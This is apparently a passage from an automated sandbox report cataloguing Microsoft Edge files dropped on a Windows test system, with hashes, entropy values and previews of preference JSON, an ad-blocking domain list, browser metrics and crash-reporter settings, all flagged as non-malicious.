Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\26919695-8dfc-4d00-ae92-ee970767c936.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45624
Entropy (8bit):	6.086146851094363
Encrypted:	false
SSDEEP:	768:bMkbJrT8IeQc5d9By7uMhDO6vP6OfBu25M9U78PIHVyAbVdGNCAotGoup1Xl3jVa:bMk1rT8H19BF6A0Vnh8NRothu3VlXr4B
MD5:	D888AC786F7292DC9F14E7614C7FA312
SHA1:	C53065C08898CAD906067547B31239DDB3BA9D31
SHA-256:	E94D52B2BD470B0B49F258EC415BC0FB24D572A87A07FC35BA465B90E34F9227
SHA-512:	D60508E2A73841E62FA61430F4D9CEDF1D47ECC39E981F46E0404D99ADF805FD481B25A18EB7CAEBDD07316F48D365C6F6EB80E440A1E2503AA3967FDDE39EB3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735279835"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\297e0a16-1108-4f05-a1eb-27b3dc383934.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44616
Entropy (8bit):	6.095759891225102
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBLwu/hDO6vP6OfBuQa2YLCyLcGoup1Xl3jVzXr4CW:z/Ps+wsI7ynEy6AJchu3VlXr4CRo1
MD5:	59FD7C9635A445F3D85466B5A8F7E3A2
SHA1:	EB7E1148F0D360901445AEE28EAFFFD666D89108
SHA-256:	5866CB640A70A8CED65CF359FFC4DBBEF143B434D9A5DC0BE15C8C31075D5811
SHA-512:	4BE8CA828BF5D77CF1DD1E01B5F55D45713C01CEC7547DBD88D66BC87CF93C2D095F91DDE5449DDDD0115CD2A6CD449E9BF24728E6401BFBDCC62952BA8F6DC4
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\3a25f8cc-a167-4422-bddd-bdc5aca46f9c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44640
Entropy (8bit):	6.095269365910976
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBLwu/hDO6vP6OfBuowMW5E+xPRocGoup1Xl3jVzXq:z/Ps+wsI7ynEy6A0chu3VlXr4CRo1
MD5:	B29D038EE885572A14773A92F96B440A
SHA1:	32EF99766DC6C842BC72B0F9FE65166607E88A13
SHA-256:	1BAA113477EC649694873495CB64501E2A5A0B7B1C7ABB6D34C5EC4CD374C6ED
SHA-512:	8F3B6E6C51D79A5C46385CBB7B6E02F04FB972D1823D1601FA99CFF2CEF9FA14160C67E83DC92D3F6200A8701983CEE7FE8C892C6442B8CDD493BCD321CCC0C0
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4b5b42be-5714-4cf8-b26e-2c3e0d202085.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44616
Entropy (8bit):	6.095349541058946
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBLwu/hDO6vP6OfBuZo2egQKFpcGoup1Xl3jVzXr4z:z/Ps+wsI7ynEy6ABchu3VlXr4CRo1
MD5:	D6934B58D249D649208F3B16565CA63A
SHA1:	53BA6BFA4A19C8BDB7E641E13EA4226180BE1BD2
SHA-256:	CBAF5CE75C7936B3787FE247E198806C4B33C7FAF9C42EE2DA6FC8FB21313B7C
SHA-512:	95ABC3852EA2730478E200078556C7643C392DEB14033535DFD1D414B50BF807278DC4F1B260864DAF74469A79E0EBE5DFE3999499FCFD7BCE8CA25A1B420984
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8edc4636-bb38-4228-9adc-0d3152d48d8b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45577
Entropy (8bit):	6.086348935602234
Encrypted:	false
SSDEEP:	768:bMkbJrT8IeQc5d9B57uMhDO6vP6OfBu25M9U78PIHVyAbVdGNCAotGoup1Xl3jVa:bMk1rT8H19BM6A0Vnh8NRothu3VlXr4B
MD5:	6712ACD83DD4BFEF3F4553E8E143A2E6
SHA1:	5B6AB7C2B4F5B8CBADC70AC29CAA026AD91B56D7
SHA-256:	2F8FAD4C14ADE72F930511185665CDDD1FDBC52046FBFF09B65A8CA36A3C0F9E
SHA-512:	59B43A22483DE9D8956DCDF4BAF1030B14FE3789D1F2097913727AF23A70F3A6FB291B34E1DB2524D9703D301ACB26FBF36CF32433153746AA1E14749CDF95D1
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735279835"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\b4cfaf7f-1418-45f6-bc52-cd0048346925.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640159940159965
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
MD5:	9B9EEAFEA0BB753A8FAEB453AB956772
SHA1:	4F886474C956DB363B327F13F3E65B53807DB52A
SHA-256:	F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
SHA-512:	F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640159940159965
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
MD5:	9B9EEAFEA0BB753A8FAEB453AB956772
SHA1:	4F886474C956DB363B327F13F3E65B53807DB52A
SHA-256:	F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
SHA-512:	F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676E44C2-A9C.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.04464079124696907
Encrypted:	false
SSDEEP:	192:UzR0pqtm7nOAWV6YdJgA8x5XSggykfhbNNETnIP/wTQsG2DRDcn8y08Tcm2RGOdB:kR0ctMM1gk9hZfSS2D608T2RGOD
MD5:	525F0DBB90911DB8EBCFA38141D401A5
SHA1:	1A11D5BF4D2B1C57C3F3BE7F7A2E54528B6FCECE
SHA-256:	C3F157903C7E7148ACEAF72468E69CEB92EA6FDFE0EB124865D72D4B554FA984
SHA-512:	EB59326ACE13E4DBC9E5EE88FACCA54D4CD1C29D70FAD32EAE6555D91A0EA7093B198AA3376E675FF827EC6B9CF262FBCE83CB866CAA10CD95DEA1B9E8060576
Malicious:	false
Preview:	...@..@...@.....C.].....@................d...T..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".pngiks20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2..........I...... .`2......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676E44CD-B04.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.04486300170738357
Encrypted:	false
SSDEEP:	192:p1Nwg0pqtm7nOAWVqY0JgA8x5XSggykfhMNNE43IS/ERQcZnD6xn8y08Tcm2RGOD:6g0ctMMMgk9hgXY9D+08T2RGOD
MD5:	401C3C3696DD401387018268B51DBBDC
SHA1:	5FB11D2D2FE341526FB363E5442AC30E32487E57
SHA-256:	73C077862AE8E99DE0C0B1BF89EFB9C837A4190343CF5244ADB68B5A3EA0F005
SHA-512:	2F62FAC924151056991AEB5B089798F39A0A168B6D04B19B7BDFADC76C80D830950F23FF493595FABCF061BDDD65C65E13E5CA3C0150C85C5C33DC63FE603B35
Malicious:	false
Preview:	...@..@...@.....C.].....@...............pe..(U..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".pngiks20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U..G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ ...2.......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676E44CD-D14.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.04461818136951364
Encrypted:	false
SSDEEP:	192:DoE0pqtm7nOAWVqYyJgA8x5XSggykfhMNNE47IW/0TQsQee9Vn8y08Tcm2RGOdB:8E0ctMMqgk9hgXWze/08T2RGOD
MD5:	97433E36D4609B22AFE3F7F4B9C173DF
SHA1:	DB69B0E7BA60DDF39D4375CC429F57EEF1A85C38
SHA-256:	B215225323636830C2A28FF8B26FAE11BACC52271313F900A4548766943D96DE
SHA-512:	5CA1F097F6B7135265DA657047F32A4F6A61AAA454BEC658289A3AD2D3F9B764B817ADABF2CE41F8D77894502C3FFD3021C8145ACBFCD7BDE013887BF55CECDE
Malicious:	false
Preview:	...@..@...@.....C.].....@...............Hc...S..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".pngiks20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676E44D6-1080.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0451760185782276
Encrypted:	false
SSDEEP:	192:a1Nno0pqtm7nOAWV6YiJZpjrZXpAgiTwhrdNEFKImdGRQ8RFt96gn8y08Tcm2RGY:ao0ctMMKRNHhZtul9n08T2RGOD
MD5:	4BF27ED71C25369F7001A30E19A73C65
SHA1:	BB18A22CBCB4A7A016E0792548F65560BEE1D5A2
SHA-256:	F3420826092E86AB15BF995CF71CAA9BD86908C88852BFA6A590FA8E3A63074A
SHA-512:	9B28522C9F119A4BF365B70EB19CDDF6DC903F8DE5D70E4AF1C1A944AB7DA3B31CDBE184D433B529CB3D2327B5FB5868998E924E10281A45DF125EE2FD574DF8
Malicious:	false
Preview:	...@..@...@.....C.].....@................f...U..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".pngiks20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U..G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. ....2........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676E44D6-183C.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.4214006034065978
Encrypted:	false
SSDEEP:	3072:Uevr28NF5UuE+kByofkcnqgQhWqx9hGDx0BZrqgZK+iDg1HF:jr2SXkByykcnMXXGiBZrqgZK+iDaH
MD5:	D6E8662152540C0B1487C382D7AC87D8
SHA1:	06F2CDFD3D66F291F587B5665E4FEDA343665BA2
SHA-256:	73C6A8A82BB55A91DB381560EB92B1803D058CBBE0FF0A15C7B45C78144B74CC
SHA-512:	084DCD0B3943A22AFCF3DB050F565A48BB1345DDADEFD4668A1F8CB0CB8F959560F18351A08B987039AE318F9B1BD95B01A57018BB9148B8D5305AEE36A257B1
Malicious:	false
Preview:	...@..@...@.....C.].....@................;...:..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".pngiks20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2.....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.132041621771752
Encrypted:	false
SSDEEP:	3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5ltl:o1ApdeaEqYsMazlYBVsJDu2ziy5
MD5:	E4267F2D3CBABA557A7DCDB568B81E3B
SHA1:	9BF08D5969436B286DF45620CA99D54B194AD190
SHA-256:	F52366B9D3854860BF7AF908D569B2C6117AF48BD74A254A928581DEF6BAE98A
SHA-512:	FC6577D3FD32F9EF340719809F3CF907479C716C0B1EDA300FB6DB2F915AAAC11E4ADCF2EE5E2175EBC49013C4286AFC9B29E972007B0D4516CA8E4BE062F216
Malicious:	false
Preview:	sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3c8ae06c-9048-4260-97c6-317d85dea652.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17656), with no line terminators
Category:	dropped
Size (bytes):	17659
Entropy (8bit):	5.49044652037579
Encrypted:	false
SSDEEP:	384:stKPGQSu4esD9SfhxvmDhaobGOQwn6WHaTYZ:sAOXuKQfy3bGd4baTYZ
MD5:	174590801FBC81C67E6E8342A6210238
SHA1:	DCC20BCC3B5C0ABAB8B7DD311184825098F92750
SHA-256:	120AF5D59FA0FCF2764EBD8EBAA87069B84B244D69D3EFCC4D2AE53C335B41AE
SHA-512:	C9766C14A978762CDE72B97472CEE7101BA78B26392B9F7E41F12C364C809D44C22A3E697743783E133B7BD9AAD0AF71D62349F7C9D5901947B46BD280171A2F
Malicious:	false
